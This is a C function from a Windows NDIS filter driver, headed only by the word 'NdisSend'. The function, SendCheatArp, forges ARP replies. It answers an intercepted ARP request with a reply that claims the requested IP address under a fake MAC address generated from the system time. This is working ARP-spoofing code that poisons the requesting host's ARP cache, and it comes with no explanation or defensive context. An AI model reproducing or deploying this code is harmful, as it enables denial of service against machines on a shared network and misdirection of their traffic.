NdisSend

VOID SendCheatArp(PADAPT pAdapt, struct ether_header* pARPFrame, struct ether_arp* pARP)
{
 UINT Status;
 PNDIS_PACKET MyPacket;
 PNDIS_BUFFER pMyBuffer;

 //
 // Get a packet off the pool and indicate that up
 //
 NdisDprAllocatePacket(&Status, &MyPacket, pAdapt->SendPacketPoolHandle);
 if (Status == NDIS_STATUS_SUCCESS )
 {
  PUCHAR pSysBuffer;
  PSEND_RSVD SendRsvd;
  struct ether_header* eth;
  struct ether_arp* arp;
  LARGE_INTEGER systime;

  KeQuerySystemTime(&systime);

  pSysBuffer = (PUCHAR)ExAllocatePool(NonPagedPool, sizeof(struct ether_header)+sizeof(struct ether_arp));
  if( NULL == pSysBuffer )
  {
   NdisDprFreePacket(MyPacket);
   return;
  }

  //Alloc a buffer
  NdisAllocateBuffer( &Status, &pMyBuffer, pAdapt->BufferPoolHandle, pSysBuffer, sizeof(struct ether_header)+sizeof(struct ether_arp) );
  if( Status != NDIS_STATUS_SUCCESS )
  {
   ExFreePool(pSysBuffer);
   NdisDprFreePacket(MyPacket);
   return;
  }

  NdisChainBufferAtFront( MyPacket, pMyBuffer);

  NdisSetPacketFlags(MyPacket, NDIS_FLAGS_DONT_LOOPBACK);

  eth=(struct ether_header*)pSysBuffer;
  arp=(struct ether_arp*)(eth+1);

  eth->ether_type = htons(ETHERTYPE_ARP);
  //RtlCopyMemory(eth->ether_shost, pAdapt->MacAddress, ETHER_ADDR_LEN);
  eth->ether_shost[0] = 0x00;
  eth->ether_shost[1] = ((u_char*)&systime)[0];
  eth->ether_shost[2] = ((u_char*)&systime)[1];
  eth->ether_shost[3] = ((u_char*)&systime)[2];
  eth->ether_shost[4] = ((u_char*)&systime)[3];
  eth->ether_shost[5] = ((u_char*)&systime)[4];
  RtlCopyMemory(eth->ether_dhost, pARPFrame->ether_shost, ETHER_ADDR_LEN);

  arp->ea_hdr.ar_hrd = pARP->ea_hdr.ar_hrd;
  arp->ea_hdr.ar_pro = pARP->ea_hdr.ar_pro;
  arp->ea_hdr.ar_hln = pARP->ea_hdr.ar_hln;
  arp->ea_hdr.ar_pln = pARP->ea_hdr.ar_pln;
  arp->ea_hdr.ar_op = htons(ARPOP_REPLY);

  //RtlCopyMemory(arp->arp_sha, eth->ether_shost, ETHER_ADDR_LEN);
  arp->arp_sha[0] = 0x00;
  arp->arp_sha[1] = ((u_char*)&systime)[0];
  arp->arp_sha[2] = ((u_char*)&systime)[1];
  arp->arp_sha[3] = ((u_char*)&systime)[2];
  arp->arp_sha[4] = ((u_char*)&systime)[3];
  arp->arp_sha[5] = ((u_char*)&systime)[4];
  RtlCopyMemory(arp->arp_spa,pARP->arp_tpa,sizeof(ULONG));

  RtlCopyMemory(arp->arp_tha, eth->ether_dhost, ETHER_ADDR_LEN);
  RtlCopyMemory(arp->arp_tpa,pARP->arp_spa,sizeof(ULONG));

  MyPacket->Private.Head->Next=NULL;
  MyPacket->Private.Tail=NULL;

  SendRsvd = (PSEND_RSVD)(MyPacket->ProtocolReserved);
  SendRsvd->OriginalPkt = NULL;
  SendRsvd->pIrp = NULL;

  NdisSend(&Status, pAdapt->BindingHandle, MyPacket);
  if(Status != NDIS_STATUS_PENDING)
  {
   PtSendComplete(pAdapt->BindingHandle,MyPacket,Status);
  }
 }
}